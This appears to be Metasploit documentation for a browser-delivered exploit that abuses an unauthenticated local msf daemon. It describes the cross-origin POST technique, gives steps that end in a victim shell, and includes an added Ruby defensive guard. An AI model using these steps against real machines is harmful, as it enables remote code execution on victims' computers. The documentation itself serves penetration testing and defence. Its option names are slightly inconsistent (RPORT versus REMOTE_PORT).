Path: blob/master/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
## Description

This module connects to the Metasploit msf daemon and uses its Ruby interpreter to obtain a shell. It is intended for the case where the vulnerable service is only listening on localhost and the attacker has not yet gained a foothold on the machine. The data that triggers code execution is sent from the victim's browser, which means the victim must visit the attacker's web site.
## Vulnerable Application

Metasploit has a legacy method of providing remote access. The msf daemon offers no authentication at all and is therefore vulnerable to any attacker with IP access to it. When the daemon is listening only on localhost, the module takes advantage of the fact that the victim's web browser has IP access to it.

Because the msfconsole program is line-based, it is possible to send commands to it through the HTTP protocol. This module places the msfconsole command in the POST data of an HTTP request. Since such POST requests are considered safe to send cross-domain, the attacker's web application can send them to localhost using the victim's browser.
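The cross-protocol weakness described above is that a line-based daemon cannot tell an HTTP request apart from a stream of commands. The following Ruby is an added example, not part of Metasploit or msfd, showing the guard a line-based command daemon would need: reject any connection whose first line is an HTTP request line before interpreting anything as a command. The two sample streams are constructed; the port in the Host header is the msfd default.

```ruby
# Added example, not part of Metasploit or msfd: a guard for a line-based
# command daemon that refuses any connection whose first line is an HTTP
# request line. A cross-origin POST from a browser always starts with one,
# so rejecting it before any line is treated as a command closes the
# cross-protocol path described in the text above.
require 'stringio'

HTTP_REQUEST_LINE = %r{\A(GET|POST|PUT|HEAD|OPTIONS|DELETE|PATCH)\s+\S+\s+HTTP/\d\.\d\z}

# True when the first line of a connection looks like "POST / HTTP/1.1":
# something a legitimate line-based client never sends.
def http_framed?(first_line)
  return false if first_line.nil?
  first_line.chomp.match?(HTTP_REQUEST_LINE)
end

# Reads lines from io and returns the command lines a daemon would execute,
# or [] if the stream was rejected as HTTP traffic. Without the check, the
# browser's headers and blank line would merely fail as unknown commands and
# the POST body would then be executed as real ones.
def accept_commands(io)
  first = io.gets
  return [] if http_framed?(first)
  lines = [first].compact
  while (line = io.gets)
    lines << line
  end
  lines.map(&:chomp).reject(&:empty?)
end

# Constructed sample streams: a genuine line-based client, and what a
# cross-origin POST from a browser looks like on the wire (msfd default port).
LEGIT = "version\nhelp\n".freeze
BROWSER = "POST / HTTP/1.1\r\nHost: 127.0.0.1:55554\r\n" \
          "Content-Type: text/plain\r\nContent-Length: 8\r\n\r\nversion\n".freeze

if __FILE__ == $PROGRAM_NAME
  p accept_commands(StringIO.new(LEGIT))   # ["version", "help"]
  p accept_commands(StringIO.new(BROWSER)) # []
end
```

This guard only hardens the daemon's framing; the actual fix for msfd is to require authentication or not to expose it to anything a browser can reach.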
All versions of Metasploit are affected, but testing has only been performed on the following targets:

- Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
- Metasploit 4.16.51 on Windows 7 (using IE; exploitation failed in Firefox and Chrome)

NB! Exploitation on Windows had a higher degree of success when the quiet flag (`-q`) was passed to the msf daemon. On Linux it made no difference.

Source code and installers:
## Verification Steps

1. Start the vulnerable service: `msfd -q -f`
2. Start `msfconsole`
3. Do: `use exploit/multi/browser/msfd_rce_browser`
4. Do: `set REMOTE_IP [IP]` (default: 127.0.0.1)
5. Do: `set RPORT [PORT]` (default: 55554)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. Do: Visit the listed URL from the victim's machine
9. You should get a shell
## Options

Options unique to this module are described below.

- **REMOTE_IP**: IP to target when running inside the victim's browser.
- **REMOTE_PORT**: Remote port the vulnerable service is running on; default is 55554.
## Scenarios

### Through the victim's browser

Visit the web site listed in a browser on the victim's machine and you should get the output below.